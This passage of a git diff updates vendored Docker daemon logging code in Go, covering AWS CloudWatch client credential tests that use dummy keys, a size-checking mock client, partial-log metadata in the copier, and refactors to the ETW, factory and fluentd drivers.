+	assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID))
+	assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey))
+}
+
+func TestNewAWSLogsClientCredentialEnvironmentVariable(t *testing.T) {
+	// required for the cloudwatchlogs client
+	os.Setenv("AWS_REGION", "us-west-2")
+	defer os.Unsetenv("AWS_REGION")
+
+	expectedAccessKeyID := "test-access-key-id"
+	expectedSecretAccessKey := "test-secret-access-key"
+
+	os.Setenv("AWS_ACCESS_KEY_ID", expectedAccessKeyID)
+	defer os.Unsetenv("AWS_ACCESS_KEY_ID")
+
+	os.Setenv("AWS_SECRET_ACCESS_KEY", expectedSecretAccessKey)
+	defer os.Unsetenv("AWS_SECRET_ACCESS_KEY")
+
+	info := logger.Info{
+		Config: map[string]string{},
+	}
+
+	c, err := newAWSLogsClient(info)
+	assert.Check(t, err)
+
+	client := c.(*cloudwatchlogs.CloudWatchLogs)
+
+	creds, err := client.Config.Credentials.Get()
+	assert.Check(t, err)
+
+	assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID))
+	assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey))
+
+}
+
+func TestNewAWSLogsClientCredentialSharedFile(t *testing.T) {
+	// required for the cloudwatchlogs client
+	os.Setenv("AWS_REGION", "us-west-2")
+	defer os.Unsetenv("AWS_REGION")
+
+	expectedAccessKeyID := "test-access-key-id"
+	expectedSecretAccessKey := "test-secret-access-key"
+
+	contentStr := `
+	[default]
+	aws_access_key_id = "test-access-key-id"
+	aws_secret_access_key =  "test-secret-access-key"
+	`
+	content := []byte(contentStr)
+
+	tmpfile, err := ioutil.TempFile("", "example")
+	defer os.Remove(tmpfile.Name()) // clean up
+	assert.Check(t, err)
+
+	_, err = tmpfile.Write(content)
+	assert.Check(t, err)
+
+	err = tmpfile.Close()
+	assert.Check(t, err)
+
+	os.Unsetenv("AWS_ACCESS_KEY_ID")
+	os.Unsetenv("AWS_SECRET_ACCESS_KEY")
+
+	os.Setenv("AWS_SHARED_CREDENTIALS_FILE", tmpfile.Name())
+	defer os.Unsetenv("AWS_SHARED_CREDENTIALS_FILE")
+
+	info := logger.Info{
+		Config: map[string]string{},
+	}
+
+	c, err := newAWSLogsClient(info)
+	assert.Check(t, err)
+
+	client := c.(*cloudwatchlogs.CloudWatchLogs)
+
+	creds, err := client.Config.Credentials.Get()
+	assert.Check(t, err)
+
+	assert.Check(t, is.Equal(expectedAccessKeyID, creds.AccessKeyID))
+	assert.Check(t, is.Equal(expectedSecretAccessKey, creds.SecretAccessKey))
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go
index b768a3d7ec..155e602b8c 100644
--- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go
@@ -1,14 +1,25 @@
-package awslogs
+package awslogs // import "github.com/docker/docker/daemon/logger/awslogs"
 
-import "github.com/aws/aws-sdk-go/service/cloudwatchlogs"
+import (
+	"fmt"
+
+	"github.com/aws/aws-sdk-go/service/cloudwatchlogs"
+)
 
 type mockcwlogsclient struct {
+	createLogGroupArgument  chan *cloudwatchlogs.CreateLogGroupInput
+	createLogGroupResult    chan *createLogGroupResult
 	createLogStreamArgument chan *cloudwatchlogs.CreateLogStreamInput
 	createLogStreamResult   chan *createLogStreamResult
 	putLogEventsArgument    chan *cloudwatchlogs.PutLogEventsInput
 	putLogEventsResult      chan *putLogEventsResult
 }
 
+type createLogGroupResult struct {
+	successResult *cloudwatchlogs.CreateLogGroupOutput
+	errorResult   error
+}
+
 type createLogStreamResult struct {
 	successResult *cloudwatchlogs.CreateLogStreamOutput
 	errorResult   error
@@ -21,6 +32,8 @@ type putLogEventsResult struct {
 
 func newMockClient() *mockcwlogsclient {
 	return &mockcwlogsclient{
+		createLogGroupArgument:  make(chan *cloudwatchlogs.CreateLogGroupInput, 1),
+		createLogGroupResult:    make(chan *createLogGroupResult, 1),
 		createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, 1),
 		createLogStreamResult:   make(chan *createLogStreamResult, 1),
 		putLogEventsArgument:    make(chan *cloudwatchlogs.PutLogEventsInput, 1),
@@ -37,6 +50,12 @@ func newMockClientBuffered(buflen int) *mockcwlogsclient {
 	}
 }
 
+func (m *mockcwlogsclient) CreateLogGroup(input *cloudwatchlogs.CreateLogGroupInput) (*cloudwatchlogs.CreateLogGroupOutput, error) {
+	m.createLogGroupArgument <- input
+	output := <-m.createLogGroupResult
+	return output.successResult, output.errorResult
+}
+
 func (m *mockcwlogsclient) CreateLogStream(input *cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) {
 	m.createLogStreamArgument <- input
 	output := <-m.createLogStreamResult
@@ -52,7 +71,30 @@ func (m *mockcwlogsclient) PutLogEvents(input *cloudwatchlogs.PutLogEventsInput)
 		LogGroupName:  input.LogGroupName,
 		LogStreamName: input.LogStreamName,
 	}
+
+	// Intended mock output
 	output := <-m.putLogEventsResult
+
+	// Checked enforced limits in mock
+	totalBytes := 0
+	for _, evt := range events {
+		if evt.Message == nil {
+			continue
+		}
+		eventBytes := len([]byte(*evt.Message))
+		if eventBytes > maximumBytesPerEvent {
+			// exceeded per event message size limits
+			return nil, fmt.Errorf("maximum bytes per event exceeded: Event too large %d, max allowed: %d", eventBytes, maximumBytesPerEvent)
+		}
+		// total event bytes including overhead
+		totalBytes += eventBytes + perEventBytes
+	}
+
+	if totalBytes > maximumBytesPerPut {
+		// exceeded per put maximum size limit
+		return nil, fmt.Errorf("maximum bytes per put exceeded: Upload too large %d, max allowed: %d", totalBytes, maximumBytesPerPut)
+	}
+
 	return output.successResult, output.errorResult
 }
 
diff --git a/vendor/github.com/docker/docker/daemon/logger/copier.go b/vendor/github.com/docker/docker/daemon/logger/copier.go
index 10ab46e162..e24272fa6d 100644
--- a/vendor/github.com/docker/docker/daemon/logger/copier.go
+++ b/vendor/github.com/docker/docker/daemon/logger/copier.go
@@ -1,4 +1,4 @@
-package logger
+package logger // import "github.com/docker/docker/daemon/logger"
 
 import (
 	"bytes"
@@ -6,12 +6,19 @@ import (
 	"sync"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	types "github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/sirupsen/logrus"
 )
 
 const (
-	bufSize  = 16 * 1024
+	// readSize is the maximum bytes read during a single read
+	// operation.
 	readSize = 2 * 1024
+
+	// defaultBufSize provides a reasonable default for loggers that do
+	// not have an external limit to impose on log line size.
+	defaultBufSize = 16 * 1024
 )
 
 // Copier can copy logs from specified sources to Logger and attach Timestamp.
@@ -44,10 +51,20 @@ func (c *Copier) Run() {
 
 func (c *Copier) copySrc(name string, src io.Reader) {
 	defer c.copyJobs.Done()
+
+	bufSize := defaultBufSize
+	if sizedLogger, ok := c.dst.(SizedLogger); ok {
+		bufSize = sizedLogger.BufSize()
+	}
 	buf := make([]byte, bufSize)
+
 	n := 0
 	eof := false
-	msg := &Message{Source: name}
+	var partialid string
+	var partialTS time.Time
+	var ordinal int
+	firstPartial := true
+	hasMorePartial := false
 
 	for {
 		select {
@@ -64,6 +81,7 @@ func (c *Copier) copySrc(name string, src io.Reader) {
 				read, err := src.Read(buf[n:upto])
 				if err != nil {
 					if err != io.EOF {
+						logReadsFailedCount.Inc(1)
 						logrus.Errorf("Error scanning log stream: %s", err)
 						return
 					}
@@ -77,15 +95,33 @@ func (c *Copier) copySrc(name string, src io.Reader) {
 			}
 			// Break up the data that we've buffered up into lines, and log each in turn.
 			p := 0
-			for q := bytes.Index(buf[p:n], []byte{'\n'}); q >= 0; q = bytes.Index(buf[p:n], []byte{'\n'}) {
-				msg.Line = buf[p : p+q]
-				msg.Timestamp = time.Now().UTC()
-				msg.Partial = false
+
+			for q := bytes.IndexByte(buf[p:n], '\n'); q >= 0; q = bytes.IndexByte(buf[p:n], '\n') {
 				select {
 				case <-c.closed:
 					return
 				default:
+					msg := NewMessage()
+					msg.Source = name
+					msg.Line = append(msg.Line, buf[p:p+q]...)
+
+					if hasMorePartial {
+						msg.PLogMetaData = &types.PartialLogMetaData{ID: partialid, Ordinal: ordinal, Last: true}
+
+						// reset
+						partialid = ""
+						ordinal = 0
+						firstPartial = true
+						hasMorePartial = false
+					}
+					if msg.PLogMetaData == nil {
+						msg.Timestamp = time.Now().UTC()
+					} else {
+						msg.Timestamp = partialTS
+					}
+
 					if logErr := c.dst.Log(msg); logErr != nil {
+						logWritesFailedCount.Inc(1)
 						logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr)
 					}
 				}
@@ -96,10 +132,29 @@ func (c *Copier) copySrc(name string, src io.Reader) {
 			// noting that it's a partial log line.
 			if eof || (p == 0 && n == len(buf)) {
 				if p < n {
-					msg.Line = buf[p:n]
-					msg.Timestamp = time.Now().UTC()
-					msg.Partial = true
+					msg := NewMessage()
+					msg.Source = name
+					msg.Line = append(msg.Line, buf[p:n]...)
+
+					// Generate unique partialID for first partial. Use it across partials.
+					// Record timestamp for first partial. Use it across partials.
+					// Initialize Ordinal for first partial. Increment it across partials.
+					if firstPartial {
+						msg.Timestamp = time.Now().UTC()
+						partialTS = msg.Timestamp
+						partialid = stringid.GenerateRandomID()
+						ordinal = 1
+						firstPartial = false
+						totalPartialLogs.Inc(1)
+					} else {
+						msg.Timestamp = partialTS
+					}
+					msg.PLogMetaData = &types.PartialLogMetaData{ID: partialid, Ordinal: ordinal, Last: false}
+					ordinal++
+					hasMorePartial = true
+
 					if logErr := c.dst.Log(msg); logErr != nil {
+						logWritesFailedCount.Inc(1)
 						logrus.Errorf("Failed to log msg %q for logger %s: %s", msg.Line, c.dst.Name(), logErr)
 					}
 					p = 0
diff --git a/vendor/github.com/docker/docker/daemon/logger/copier_test.go b/vendor/github.com/docker/docker/daemon/logger/copier_test.go
index cfd816a6eb..d09450bd19 100644
--- a/vendor/github.com/docker/docker/daemon/logger/copier_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/copier_test.go
@@ -1,4 +1,4 @@
-package logger
+package logger // import "github.com/docker/docker/daemon/logger"
 
 import (
 	"bytes"
@@ -31,6 +31,25 @@ func (l *TestLoggerJSON) Close() error { return nil }
 
 func (l *TestLoggerJSON) Name() string { return "json" }
 
+type TestSizedLoggerJSON struct {
+	*json.Encoder
+	mu sync.Mutex
+}
+
+func (l *TestSizedLoggerJSON) Log(m *Message) error {
+	l.mu.Lock()
+	defer l.mu.Unlock()
+	return l.Encode(m)
+}
+
+func (*TestSizedLoggerJSON) Close() error { return nil }
+
+func (*TestSizedLoggerJSON) Name() string { return "sized-json" }
+
+func (*TestSizedLoggerJSON) BufSize() int {
+	return 32 * 1024
+}
+
 func TestCopier(t *testing.T) {
 	stdoutLine := "Line that thinks that it is log line from docker stdout"
 	stderrLine := "Line that thinks that it is log line from docker stderr"
@@ -104,10 +123,9 @@ func TestCopier(t *testing.T) {
 
 // TestCopierLongLines tests long lines without line breaks
 func TestCopierLongLines(t *testing.T) {
-	// Long lines (should be split at "bufSize")
-	const bufSize = 16 * 1024
-	stdoutLongLine := strings.Repeat("a", bufSize)
-	stderrLongLine := strings.Repeat("b", bufSize)
+	// Long lines (should be split at "defaultBufSize")
+	stdoutLongLine := strings.Repeat("a", defaultBufSize)
+	stderrLongLine := strings.Repeat("b", defaultBufSize)
 	stdoutTrailingLine := "stdout trailing line"
 	stderrTrailingLine := "stderr trailing line"
 
@@ -200,15 +218,185 @@ func TestCopierSlow(t *testing.T) {
 	c.Close()
 	select {
 	case <-time.After(200 * time.Millisecond):
-		t.Fatalf("failed to exit in time after the copier is closed")
+		t.Fatal("failed to exit in time after the copier is closed")
 	case <-wait:
 	}
 }
 
+func TestCopierWithSized(t *testing.T) {
+	var jsonBuf bytes.Buffer
+	expectedMsgs := 2
+	sizedLogger := &TestSizedLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)}
+	logbuf := bytes.NewBufferString(strings.Repeat(".", sizedLogger.BufSize()*expectedMsgs))
+	c := NewCopier(map[string]io.Reader{"stdout": logbuf}, sizedLogger)
+
+	c.Run()
+	// Wait for Copier to finish writing to the buffered logger.
+	c.Wait()
+	c.Close()
+
+	recvdMsgs := 0
+	dec := json.NewDecoder(&jsonBuf)
+	for {
+		var msg Message
+		if err := dec.Decode(&msg); err != nil {
+			if err == io.EOF {
+				break
+			}
+			t.Fatal(err)
+		}
+		if msg.Source != "stdout" {
+			t.Fatalf("Wrong Source: %q, should be %q", msg.Source, "stdout")
+		}
+		if len(msg.Line) != sizedLogger.BufSize() {
+			t.Fatalf("Line was not of expected max length %d, was %d", sizedLogger.BufSize(), len(msg.Line))
+		}
+		recvdMsgs++
+	}
+	if recvdMsgs != expectedMsgs {
+		t.Fatalf("expected to receive %d messages, actually received %d", expectedMsgs, recvdMsgs)
+	}
+}
+
+func checkIdentical(t *testing.T, msg Message, expectedID string, expectedTS time.Time) {
+	if msg.PLogMetaData.ID != expectedID {
+		t.Fatalf("IDs are not he same across partials. Expected: %s Received: %s",
+			expectedID, msg.PLogMetaData.ID)
+	}
+	if msg.Timestamp != expectedTS {
+		t.Fatalf("Timestamps are not the same across partials. Expected: %v Received: %v",
+			expectedTS.Format(time.UnixDate), msg.Timestamp.Format(time.UnixDate))
+	}
+}
+
+// Have long lines and make sure that it comes out with PartialMetaData
+func TestCopierWithPartial(t *testing.T) {
+	stdoutLongLine := strings.Repeat("a", defaultBufSize)
+	stderrLongLine := strings.Repeat("b", defaultBufSize)
+	stdoutTrailingLine := "stdout trailing line"
+	stderrTrailingLine := "stderr trailing line"
+	normalStr := "This is an impartial message :)"
+
+	var stdout bytes.Buffer
+	var stderr bytes.Buffer
+	var normalMsg bytes.Buffer
+
+	for i := 0; i < 3; i++ {
+		if _, err := stdout.WriteString(stdoutLongLine); err != nil {
+			t.Fatal(err)
+		}
+		if _, err := stderr.WriteString(stderrLongLine); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	if _, err := stdout.WriteString(stdoutTrailingLine + "\n"); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := stderr.WriteString(stderrTrailingLine + "\n"); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := normalMsg.WriteString(normalStr + "\n"); err != nil {
+		t.Fatal(err)
+	}
+
+	var jsonBuf bytes.Buffer
+
+	jsonLog := &TestLoggerJSON{Encoder: json.NewEncoder(&jsonBuf)}
+
+	c := NewCopier(
+		map[string]io.Reader{
+			"stdout": &stdout,
+			"normal": &normalMsg,
+			"stderr": &stderr,
+		},
+		jsonLog)
+	c.Run()
+	wait := make(chan struct{})
+	go func() {
+		c.Wait()
+		close(wait)
+	}()
+	select {
+	case <-time.After(1 * time.Second):
+		t.Fatal("Copier failed to do its work in 1 second")
+	case <-wait:
+	}
+
+	dec := json.NewDecoder(&jsonBuf)
+	expectedMsgs := 9
+	recvMsgs := 0
+	var expectedPartID1, expectedPartID2 string
+	var expectedTS1, expectedTS2 time.Time
+
+	for {
+		var msg Message
+
+		if err := dec.Decode(&msg); err != nil {
+			if err == io.EOF {
+				break
+			}
+			t.Fatal(err)
+		}
+		if msg.Source != "stdout" && msg.Source != "stderr" && msg.Source != "normal" {
+			t.Fatalf("Wrong Source: %q, should be %q or %q or %q", msg.Source, "stdout", "stderr", "normal")
+		}
+
+		if msg.Source == "stdout" {
+			if string(msg.Line) != stdoutLongLine && string(msg.Line) != stdoutTrailingLine {
+				t.Fatalf("Wrong Line: %q, expected 'stdoutLongLine' or 'stdoutTrailingLine'", msg.Line)
+			}
+
+			if msg.PLogMetaData.ID == "" {
+				t.Fatalf("Expected partial metadata. Got nothing")
+			}
+
+			if msg.PLogMetaData.Ordinal == 1 {
+				expectedPartID1 = msg.PLogMetaData.ID
+				expectedTS1 = msg.Timestamp
+			} else {
+				checkIdentical(t, msg, expectedPartID1, expectedTS1)
+			}
+			if msg.PLogMetaData.Ordinal == 4 && !msg.PLogMetaData.Last {
+				t.Fatalf("Last is not set for last chunk")
+			}
+		}
+
+		if msg.Source == "stderr" {
+			if string(msg.Line) != stderrLongLine && string(msg.Line) != stderrTrailingLine {
+				t.Fatalf("Wrong Line: %q, expected 'stderrLongLine' or 'stderrTrailingLine'", msg.Line)
+			}
+
+			if msg.PLogMetaData.ID == "" {
+				t.Fatalf("Expected partial metadata. Got nothing")
+			}
+
+			if msg.PLogMetaData.Ordinal == 1 {
+				expectedPartID2 = msg.PLogMetaData.ID
+				expectedTS2 = msg.Timestamp
+			} else {
+				checkIdentical(t, msg, expectedPartID2, expectedTS2)
+			}
+			if msg.PLogMetaData.Ordinal == 4 && !msg.PLogMetaData.Last {
+				t.Fatalf("Last is not set for last chunk")
+			}
+		}
+
+		if msg.Source == "normal" && msg.PLogMetaData != nil {
+			t.Fatalf("Normal messages should not have PartialLogMetaData")
+		}
+		recvMsgs++
+	}
+
+	if expectedMsgs != recvMsgs {
+		t.Fatalf("Expected msgs: %d Recv msgs: %d", expectedMsgs, recvMsgs)
+	}
+}
+
 type BenchmarkLoggerDummy struct {
 }
 
-func (l *BenchmarkLoggerDummy) Log(m *Message) error { return nil }
+func (l *BenchmarkLoggerDummy) Log(m *Message) error { PutMessage(m); return nil }
 
 func (l *BenchmarkLoggerDummy) Close() error { return nil }
 
diff --git a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go
index f296d7f165..78d3477b61 100644
--- a/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go
+++ b/vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go
@@ -10,17 +10,16 @@
 //
 // Each container log message generates an ETW event that also contains:
 // the container name and ID, the timestamp, and the stream type.
-package etwlogs
+package etwlogs // import "github.com/docker/docker/daemon/logger/etwlogs"
 
 import (
 	"errors"
 	"fmt"
 	"sync"
-	"syscall"
 	"unsafe"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/logger"
+	"github.com/sirupsen/logrus"
 	"golang.org/x/sys/windows"
 )
 
@@ -42,41 +41,43 @@ var (
 	procEventWriteString = modAdvapi32.NewProc("EventWriteString")
 	procEventUnregister  = modAdvapi32.NewProc("EventUnregister")
 )
-var providerHandle syscall.Handle
+var providerHandle windows.Handle
 var refCount int
 var mu sync.Mutex
 
 func init() {
-	providerHandle = syscall.InvalidHandle
+	providerHandle = windows.InvalidHandle
 	if err := logger.RegisterLogDriver(name, New); err != nil {
 		logrus.Fatal(err)
 	}
 }
 
 // New creates a new etwLogs logger for the given container and registers the EWT provider.
-func New(ctx logger.Context) (logger.Logger, error) {
+func New(info logger.Info) (logger.Logger, error) {
 	if err := registerETWProvider(); err != nil {
 		return nil, err
 	}
-	logrus.Debugf("logging driver etwLogs configured for container: %s.", ctx.ContainerID)
+	logrus.Debugf("logging driver etwLogs configured for container: %s.", info.ContainerID)
 
 	return &etwLogs{
-		containerName: fixContainerName(ctx.ContainerName),
-		imageName:     ctx.ContainerImageName,
-		containerID:   ctx.ContainerID,
-		imageID:       ctx.ContainerImageID,
+		containerName: info.Name(),
+		imageName:     info.ContainerImageName,
+		containerID:   info.ContainerID,
+		imageID:       info.ContainerImageID,
 	}, nil
 }
 
 // Log logs the message to the ETW stream.
 func (etwLogger *etwLogs) Log(msg *logger.Message) error {
-	if providerHandle == syscall.InvalidHandle {
+	if providerHandle == windows.InvalidHandle {
 		// This should never be hit, if it is, it indicates a programming error.
 		errorMessage := "ETWLogs cannot log the message, because the event provider has not been registered."
 		logrus.Error(errorMessage)
 		return errors.New(errorMessage)
 	}
-	return callEventWriteString(createLogMessage(etwLogger, msg))
+	m := createLogMessage(etwLogger, msg)
+	logger.PutMessage(msg)
+	return callEventWriteString(m)
 }
 
 // Close closes the logger by unregistering the ETW provider.
@@ -99,14 +100,6 @@ func createLogMessage(etwLogger *etwLogs, msg *logger.Message) string {
 		msg.Line)
 }
 
-// fixContainerName removes the initial '/' from the container name.
-func fixContainerName(cntName string) string {
-	if len(cntName) > 0 && cntName[0] == '/' {
-		cntName = cntName[1:]
-	}
-	return cntName
-}
-
 func registerETWProvider() error {
 	mu.Lock()
 	defer mu.Unlock()
@@ -127,7 +120,7 @@ func unregisterETWProvider() {
 	if refCount == 1 {
 		if callEventUnregister() {
 			refCount--
-			providerHandle = syscall.InvalidHandle
+			providerHandle = windows.InvalidHandle
 		}
 		// Not returning an error if EventUnregister fails, because etwLogs will continue to work
 	} else {
@@ -137,9 +130,11 @@ func unregisterETWProvider() {
 
 func callEventRegister() error {
 	// The provider's GUID is {a3693192-9ed6-46d2-a981-f8226c8363bd}
-	guid := syscall.GUID{
-		0xa3693192, 0x9ed6, 0x46d2,
-		[8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd},
+	guid := windows.GUID{
+		Data1: 0xa3693192,
+		Data2: 0x9ed6,
+		Data3: 0x46d2,
+		Data4: [8]byte{0xa9, 0x81, 0xf8, 0x22, 0x6c, 0x83, 0x63, 0xbd},
 	}
 
 	ret, _, _ := procEventRegister.Call(uintptr(unsafe.Pointer(&guid)), 0, 0, uintptr(unsafe.Pointer(&providerHandle)))
@@ -152,7 +147,13 @@ func callEventRegister() error {
 }
 
 func callEventWriteString(message string) error {
-	ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(message))))
+	utf16message, err := windows.UTF16FromString(message)
+
+	if err != nil {
+		return err
+	}
+
+	ret, _, _ := procEventWriteString.Call(uintptr(providerHandle), 0, 0, uintptr(unsafe.Pointer(&utf16message[0])))
 	if ret != win32CallSuccess {
 		errorMessage := fmt.Sprintf("ETWLogs provider failed to log message. Error: %d", ret)
 		logrus.Error(errorMessage)
@@ -163,8 +164,5 @@ func callEventWriteString(message string) error {
 
 func callEventUnregister() bool {
 	ret, _, _ := procEventUnregister.Call(uintptr(providerHandle))
-	if ret != win32CallSuccess {
-		return false
-	}
-	return true
+	return ret == win32CallSuccess
 }
diff --git a/vendor/github.com/docker/docker/daemon/logger/factory.go b/vendor/github.com/docker/docker/daemon/logger/factory.go
index 9cf716b09a..84b54b2794 100644
--- a/vendor/github.com/docker/docker/daemon/logger/factory.go
+++ b/vendor/github.com/docker/docker/daemon/logger/factory.go
@@ -1,12 +1,18 @@
-package logger
+package logger // import "github.com/docker/docker/daemon/logger"
 
 import (
 	"fmt"
+	"sort"
 	"sync"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/go-units"
+	"github.com/pkg/errors"
 )
 
 // Creator builds a logging driver instance with given context.
-type Creator func(Context) (Logger, error)
+type Creator func(Info) (Logger, error)
 
 // LogOptValidator checks the options specific to the underlying
 // logging implementation.
@@ -18,6 +24,22 @@ type logdriverFactory struct {
 	m            sync.Mutex
 }
 
+func (lf *logdriverFactory) list() []string {
+	ls := make([]string, 0, len(lf.registry))
+	lf.m.Lock()
+	for name := range lf.registry {
+		ls = append(ls, name)
+	}
+	lf.m.Unlock()
+	sort.Strings(ls)
+	return ls
+}
+
+// ListDrivers gets the list of registered log driver names
+func ListDrivers() []string {
+	return factory.list()
+}
+
 func (lf *logdriverFactory) register(name string, c Creator) error {
 	if lf.driverRegistered(name) {
 		return fmt.Errorf("logger: log driver named '%s' is already registered", name)
@@ -33,6 +55,13 @@ func (lf *logdriverFactory) driverRegistered(name string) bool {
 	lf.m.Lock()
 	_, ok := lf.registry[name]
 	lf.m.Unlock()
+	if !ok {
+		if pluginGetter != nil { // this can be nil when the init functions are running
+			if l, _ := getPlugin(name, plugingetter.Lookup); l != nil {
+				return true
+			}
+		}
+	}
 	return ok
 }
 
@@ -52,17 +81,19 @@ func (lf *logdriverFactory) get(name string) (Creator, error) {
 	defer lf.m.Unlock()
 
 	c, ok := lf.registry[name]
-	if !ok {
-		return c, fmt.Errorf("logger: no log driver named '%s' is registered", name)
+	if ok {
+		return c, nil
 	}
-	return c, nil
+
+	c, err := getPlugin(name, plugingetter.Acquire)
+	return c, errors.Wrapf(err, "logger: no log driver named '%s' is registered", name)
 }
 
 func (lf *logdriverFactory) getLogOptValidator(name string) LogOptValidator {
 	lf.m.Lock()
 	defer lf.m.Unlock()
 
-	c, _ := lf.optValidator[name]
+	c := lf.optValidator[name]
 	return c
 }
 
@@ -85,6 +116,11 @@ func GetLogDriver(name string) (Creator, error) {
 	return factory.get(name)
 }
 
+var builtInLogOpts = map[string]bool{
+	"mode":            true,
+	"max-buffer-size": true,
+}
+
 // ValidateLogOpts checks the options for the given log driver. The
 // options supported are specific to the LogDriver implementation.
 func ValidateLogOpts(name string, cfg map[string]string) error {
@@ -92,13 +128,35 @@ func ValidateLogOpts(name string, cfg map[string]string) error {
 		return nil
 	}
 
+	switch containertypes.LogMode(cfg["mode"]) {
+	case containertypes.LogModeBlocking, containertypes.LogModeNonBlock, containertypes.LogModeUnset:
+	default:
+		return fmt.Errorf("logger: logging mode not supported: %s", cfg["mode"])
+	}
+
+	if s, ok := cfg["max-buffer-size"]; ok {
+		if containertypes.LogMode(cfg["mode"]) != containertypes.LogModeNonBlock {
+			return fmt.Errorf("logger: max-buffer-size option is only supported with 'mode=%s'", containertypes.LogModeNonBlock)
+		}
+		if _, err := units.RAMInBytes(s); err != nil {
+			return errors.Wrap(err, "error parsing option max-buffer-size")
+		}
+	}
+
 	if !factory.driverRegistered(name) {
 		return fmt.Errorf("logger: no log driver named '%s' is registered", name)
 	}
 
+	filteredOpts := make(map[string]string, len(builtInLogOpts))
+	for k, v := range cfg {
+		if !builtInLogOpts[k] {
+			filteredOpts[k] = v
+		}
+	}
+
 	validator := factory.getLogOptValidator(name)
 	if validator != nil {
-		return validator(cfg)
+		return validator(filteredOpts)
 	}
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go
index a8303cf97b..907261f41f 100644
--- a/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go
+++ b/vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go
@@ -1,6 +1,6 @@
 // Package fluentd provides the log driver for forwarding server logs
 // to fluentd endpoints.
-package fluentd
+package fluentd // import "github.com/docker/docker/daemon/logger/fluentd"
 
 import (
 	"fmt"
@@ -11,13 +11,13 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/logger"
 	"github.com/docker/docker/daemon/logger/loggerutils"
 	"github.com/docker/docker/pkg/urlutil"
 	"github.com/docker/go-units"
 	"github.com/fluent/fluent-logger-golang/fluent"
 	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 type fluentd struct {
@@ -48,11 +48,12 @@ const (
 	defaultRetryWait  = 1000
 	defaultMaxRetries = math.MaxInt32
 
-	addressKey      = "fluentd-address"
-	bufferLimitKey  = "fluentd-buffer-limit"
-	retryWaitKey    = "fluentd-retry-wait"
-	maxRetriesKey   = "fluentd-max-retries"
-	asyncConnectKey = "fluentd-async-connect"
+	addressKey            = "fluentd-address"
+	bufferLimitKey        = "fluentd-buffer-limit"
+	retryWaitKey          = "fluentd-retry-wait"
+	maxRetriesKey         = "fluentd-max-retries"
+	asyncConnectKey       = "fluentd-async-connect"
+	subSecondPrecisionKey = "fluentd-sub-second-precision"
 )
 
 func init() {
@@ -67,22 +68,25 @@ func init() {
 // New creates a fluentd logger using the configuration passed in on
 // the context. The supported context configuration variable is
 // fluentd-address.
-func New(ctx logger.Context) (logger.Logger, error) {
-	loc, err := parseAddress(ctx.Config[addressKey])
+func New(info logger.Info) (logger.Logger, error) {
+	loc, err := parseAddress(info.Config[addressKey])
 	if err != nil {
 		return nil, err
 	}
 
-	tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+	tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate)
 	if err != nil {
 		return nil, err
 	}
 
-	extra := ctx.ExtraAttributes(nil)
+	extra, err := info.ExtraAttributes(nil)
+	if err != nil {
+		return nil, err
+	}
 
 	bufferLimit := defaultBufferLimit
-	if ctx.Config[bufferLimitKey] != "" {
-		bl64, err := units.RAMInBytes(ctx.Config[bufferLimitKey])
+	if info.Config[bufferLimitKey] != "" {
+		bl64, err := units.RAMInBytes(info.Config[bufferLimitKey])
 		if err != nil {
 			return nil, err
 		}
@@ -90,8 +94,8 @@ func New(ctx logger.Context) (logger.Logger, error) {
 	}
 
 	retryWait := defaultRetryWait
-	if ctx.Config[retryWaitKey] != "" {
-		rwd, err := time.ParseDuration(ctx.Config[retryWaitKey])
+	if info.Config[retryWaitKey] != "" {
+		rwd, err := time.ParseDuration(info.Config[retryWaitKey])
 		if err != nil {
 			return nil, err
 		}
@@ -99,8 +103,8 @@ func New(ctx logger.Context) (logger.Logger, error) {
 	}
 
 	maxRetries := defaultMaxRetries
-	if ctx.Config[maxRetriesKey] != "" {
-		mr64, err := strconv.ParseUint(ctx.Config[maxRetriesKey], 10, strconv.IntSize)
+	if info.Config[maxRetriesKey] != "" {
+		mr64, err := strconv.ParseUint(info.Config[maxRetriesKey], 10, strconv.IntSize)
 		if err != nil {
 			return nil, err
 		}
@@ -108,24 +112,32 @@ func New(ctx logger.Context) (logger.Logger, error) {
 	}
 
 	asyncConnect := false
-	if ctx.Config[asyncConnectKey] != "" {
